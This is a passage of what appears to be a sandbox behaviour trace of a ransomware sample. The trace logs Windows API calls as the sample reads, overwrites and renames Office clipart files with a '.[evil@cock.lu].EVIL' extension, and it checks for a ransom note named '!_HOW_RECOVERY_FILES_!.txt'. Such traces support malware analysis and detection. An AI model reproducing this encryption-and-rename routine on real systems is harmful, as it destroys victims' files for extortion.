lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341554.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341554.jpg.[evil@cock.lu].evil")) returned 1 [0155.835] ??_V@YAXPEAX@Z () returned 0x1 [0155.862] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341554.JPG", dwFileAttributes=0x200) returned 0 [0155.879] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.879] wcsstr (_Str="J0341557.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.879] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341557.JPG") returned 69 [0155.879] wcscmp (_String1="J0341557.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.879] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0341557.JPG") returned 0x0 [0155.879] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341557.JPG") returned 0x45 [0155.879] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341557.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341557.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.883] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6aa8, lpOverlapped=0x0) returned 1 [0155.924] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.924] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.924] _errno () returned 0x84b1160840 [0155.924] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.924] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x6ac0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6ac0, lpOverlapped=0x0) returned 1 [0155.973] CloseHandle (hObject=0x1a8) returned 1 [0156.028] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341557.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.029] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.029] __uncaught_exception () returned 0x84b1160800 [0156.029] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.029] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341557.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341557.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341557.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341557.jpg.[evil@cock.lu].evil")) returned 1 [0156.079] ??_V@YAXPEAX@Z () returned 0x1 [0156.081] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341557.JPG", dwFileAttributes=0x200) returned 0 [0156.081] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.081] wcsstr (_Str="J0341559.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.081] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341559.JPG") returned 69 [0156.081] wcscmp (_String1="J0341559.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.082] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0341559.JPG") returned 0x0 [0156.082] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341559.JPG") returned 0x45 [0156.082] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341559.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341559.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.083] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6873, lpOverlapped=0x0) returned 1 [0156.099] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.099] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.099] _errno () returned 0x84b1160840 [0156.100] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.100] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x6880, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6880, lpOverlapped=0x0) returned 1 [0156.100] CloseHandle (hObject=0x1a8) returned 1 [0156.100] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341559.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.100] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.100] __uncaught_exception () returned 0x84b1160800 [0156.100] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.101] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341559.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341559.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341559.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341559.jpg.[evil@cock.lu].evil")) returned 1 [0156.102] ??_V@YAXPEAX@Z () returned 0x1 [0156.105] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341559.JPG", dwFileAttributes=0x200) returned 0 [0156.105] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.105] wcsstr (_Str="J0341561.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.105] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341561.JPG") returned 69 [0156.105] wcscmp (_String1="J0341561.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.105] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0341561.JPG") returned 0x0 [0156.105] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341561.JPG") returned 0x45 [0156.105] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341561.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341561.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.108] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa497, lpOverlapped=0x0) returned 1 [0156.116] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.116] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.116] _errno () returned 0x84b1160840 [0156.116] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.116] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0xa4a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa4a0, lpOverlapped=0x0) returned 1 [0156.116] CloseHandle (hObject=0x1a8) returned 1 [0156.116] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341561.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.116] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.116] __uncaught_exception () returned 0x84b1160800 [0156.116] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.117] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341561.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341561.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341561.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341561.jpg.[evil@cock.lu].evil")) returned 1 [0156.117] ??_V@YAXPEAX@Z () returned 0x1 [0156.120] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341561.JPG", dwFileAttributes=0x200) returned 0 [0156.120] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.120] wcsstr (_Str="J0341634.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.120] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341634.JPG") returned 69 [0156.120] wcscmp (_String1="J0341634.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.120] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0341634.JPG") returned 0x0 [0156.120] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341634.JPG") returned 0x45 [0156.121] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341634.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341634.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.123] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1e7b, lpOverlapped=0x0) returned 1 [0156.131] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.131] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.131] _errno () returned 0x84b1160840 [0156.131] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.131] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1e80, lpOverlapped=0x0) returned 1 [0156.131] CloseHandle (hObject=0x1a8) returned 1 [0156.132] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341634.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.132] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.132] __uncaught_exception () returned 0x84b1160800 [0156.132] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.132] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341634.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341634.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341634.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341634.jpg.[evil@cock.lu].evil")) returned 1 [0156.133] ??_V@YAXPEAX@Z () returned 0x1 [0156.136] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341634.JPG", dwFileAttributes=0x200) returned 0 [0156.136] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.136] wcsstr (_Str="J0341636.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.136] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341636.JPG") returned 69 [0156.136] wcscmp (_String1="J0341636.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.136] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0341636.JPG") returned 0x0 [0156.136] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341636.JPG") returned 0x45 [0156.136] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341636.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341636.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.139] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3615, lpOverlapped=0x0) returned 1 [0156.153] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.153] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.153] _errno () returned 0x84b1160840 [0156.153] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.153] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x3620, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3620, lpOverlapped=0x0) returned 1 [0156.154] CloseHandle (hObject=0x1a8) returned 1 [0156.154] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341636.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.154] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.154] __uncaught_exception () returned 0x84b1160800 [0156.155] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.155] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341636.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341636.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341636.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341636.jpg.[evil@cock.lu].evil")) returned 1 [0156.156] ??_V@YAXPEAX@Z () returned 0x1 [0156.159] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341636.JPG", dwFileAttributes=0x200) returned 0 [0156.159] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.159] wcsstr (_Str="J0341645.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.159] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341645.JPG") returned 69 [0156.160] wcscmp (_String1="J0341645.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.160] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0341645.JPG") returned 0x0 [0156.160] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341645.JPG") returned 0x45 [0156.160] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341645.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341645.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.162] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2026, lpOverlapped=0x0) returned 1 [0156.229] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.229] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.229] _errno () returned 0x84b1160840 [0156.229] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.229] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x2040, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2040, lpOverlapped=0x0) returned 1 [0156.229] CloseHandle (hObject=0x1a8) returned 1 [0156.229] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341645.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.230] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.230] __uncaught_exception () returned 0x84b1160800 [0156.230] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.230] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341645.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341645.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341645.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341645.jpg.[evil@cock.lu].evil")) returned 1 [0156.232] ??_V@YAXPEAX@Z () returned 0x1 [0156.235] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341645.JPG", dwFileAttributes=0x200) returned 0 [0156.236] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.236] wcsstr (_Str="J0341653.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.236] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341653.JPG") returned 69 [0156.236] wcscmp (_String1="J0341653.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.236] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0341653.JPG") returned 0x0 [0156.236] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341653.JPG") returned 0x45 [0156.236] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341653.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341653.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.238] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3df7, lpOverlapped=0x0) returned 1 [0156.261] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.261] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.261] _errno () returned 0x84b1160840 [0156.261] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.261] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x3e00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3e00, lpOverlapped=0x0) returned 1 [0156.261] CloseHandle (hObject=0x1a8) returned 1 [0156.261] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341653.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.261] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.262] __uncaught_exception () returned 0x84b1160800 [0156.262] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.262] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341653.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341653.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341653.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341653.jpg.[evil@cock.lu].evil")) returned 1 [0156.263] ??_V@YAXPEAX@Z () returned 0x1 [0156.266] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341653.JPG", dwFileAttributes=0x200) returned 0 [0156.266] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.266] wcsstr (_Str="J0341654.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.266] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341654.JPG") returned 69 [0156.266] wcscmp (_String1="J0341654.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.266] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0341654.JPG") returned 0x0 [0156.266] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341654.JPG") returned 0x45 [0156.266] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341654.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341654.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.268] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3d7f, lpOverlapped=0x0) returned 1 [0156.278] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.278] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.279] _errno () returned 0x84b1160840 [0156.279] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.279] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x3d80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3d80, lpOverlapped=0x0) returned 1 [0156.279] CloseHandle (hObject=0x1a8) returned 1 [0156.279] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341654.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.280] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.280] __uncaught_exception () returned 0x84b1160800 [0156.280] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.280] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341654.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341654.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341654.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341654.jpg.[evil@cock.lu].evil")) returned 1 [0156.281] ??_V@YAXPEAX@Z () returned 0x1 [0156.285] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341654.JPG", dwFileAttributes=0x200) returned 0 [0156.285] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.285] wcsstr 